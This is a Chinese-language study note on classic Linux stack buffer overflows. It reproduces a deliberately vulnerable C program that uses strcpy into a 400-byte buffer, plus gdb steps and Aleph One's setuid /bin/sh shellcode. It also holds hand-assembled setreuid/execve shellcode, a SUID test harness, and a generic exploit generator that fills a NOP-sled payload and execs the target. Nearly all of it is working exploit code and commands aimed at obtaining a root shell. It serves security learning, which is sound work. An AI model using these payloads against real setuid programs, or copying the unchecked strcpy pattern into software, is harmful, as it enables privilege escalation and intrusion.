linux缓冲区溢出学习

漏洞代码：

//meet.c
#include<stdio.h>
greeting(char *temp1,char *temp2){
  char name[400];
  strcpy(name,temp2);
  printf("Hello %s %s\n",temp1,name);
}
main(int argc,char *argv[]){
  greeting(argv[1],argv[2]);
  printf("Bye %s %s\n",argv[1],argv[2]);
}

调试语句：

gcc -mpreferred-stack-boundary=2 -o meet -ggdb meet.c

gdb meet

list

b 6

`perl -e 'print "A"x403'`

aleph1的shellcode

//shellcode.c
char shellcode[]=
  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
void main(){
  int *ret;
  ret=(int *)&ret+2;
  (*ret)=(int)shellcode;
}

 获得当前esp值

#include<stdio.h>
unsigned long get_sp(void){
  __asm__("movl %esp,%eax");
}
int main(){
  printf("Stack pointer(ESP):0x%x\n",get_sp());}

 perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";'>sc

./meet Mr `perl -e 'print "\x90"x203'``cat sc``perl -e 'print "\x88\xf5\xff\xbf"x89'`

编写自己的shellcode

1.编写汇编

section .text
global _start
_start:
;setreuid(0,0)
xor eax,eax
mov al,0x46
xor ebx,ebx
xor ecx,ecx
int 0x80

;用execve执行shellcode
xor eax,eax
push eax
push 0x68732f2f
push 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
xor edx,edx
mov al,0xb
int 0x80

 2.生成可执行文件

nasm -f elf sc.asm

ld -o sc sc.o

3.提取十六进制代码

objdump -d ./sc

[root@localhost root]# objdump -d ./sc
 
./sc:     file format elf32-i386
 
Disassembly of section .text:
 
08048080 <_start>:
 8048080:       31 c0                   xor    %eax,%eax
 8048082:       b0 46                   mov    $0x46,%al
 8048084:       31 db                   xor    %ebx,%ebx
 8048086:       31 c9                   xor    %ecx,%ecx
 8048088:       cd 80                   int    $0x80
 804808a:       31 c0                   xor    %eax,%eax
 804808c:       50                      push   %eax
 804808d:       68 2f 2f 73 68          push   $0x68732f2f
 8048092:       68 2f 62 69 6e          push   $0x6e69622f
 8048097:       89 e3                   mov    %esp,%ebx
 8048099:       50                      push   %eax
 804809a:       53                      push   %ebx
 804809b:       89 e1                   mov    %esp,%ecx
 804809d:       31 d2                   xor    %edx,%edx
 804809f:       b0 0b                   mov    $0xb,%al
 80480a1:       cd 80                   int    $0x80

4.放到程序里面测试shellcode

//sc2.c
char sc[]=
"\x31\xc0"
"\xb0\x46"
"\x31\xdb"
"\x31\xc9"
"\xcd\x80"
"\x31\xc0"
"\x50"
"\x68\x2f\x2f\x73\x68"
"\x68\x2f\x62\x69\x6e"
"\x89\xe3"
"\x50"
"\x53"
"\x89\xe1"
"\x31\xd2"
"\xb0\x0b"
"\xcd\x80";
main()
{
  void (*fp)(void);
  fp=(void *)sc;
  fp();
}

 5.设置SUID并执行

sudo chown root sc2

sudo chmod +s sc2

./sc2

通用exploit代码

//exploit.c
#include<stdio.h>
char shellcode[]= //setuid(0)
  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void){
  __asm__("movl %esp,%eax");
}
int main(int argc,char *argv[1]){
int i,offset=0;
long esp,ret,*addr_ptr;
char *buffer,*ptr;
int size=500;
esp=get_sp();
if(argc>1) size=atoi(argv[1]);
if(argc>2) offset=atoi(argv[2]);
if(argc>3) esp=strtoul(argv[3],NULL,0);
ret=esp-offset;
fprintf(stderr,"Usage:%s<buff_size><offset><esp:0xfff...>\n",argv[0]);
fprintf(stderr,"ESP:0x%x Offset:0x%x Return:0x%x\n",esp,offset,ret);
buffer=(char *)malloc(size);
ptr=buffer;
addr_ptr=(long *)ptr;
for(i=0;i<size;i+=4){
*(addr_ptr++)=ret;
}
for(i=0;i<size/2;i++){
buffer[i]='\x90';}
ptr=buffer+size/2;
for(i=0;i<strlen(shellcode);i++){
*(ptr++)=shellcode[i];
}
buffer[size-1]=0;
execl("./meet","meet","Mr.",buffer,0);
printf("%s\n",buffer);
free(buffer);
return 0;
}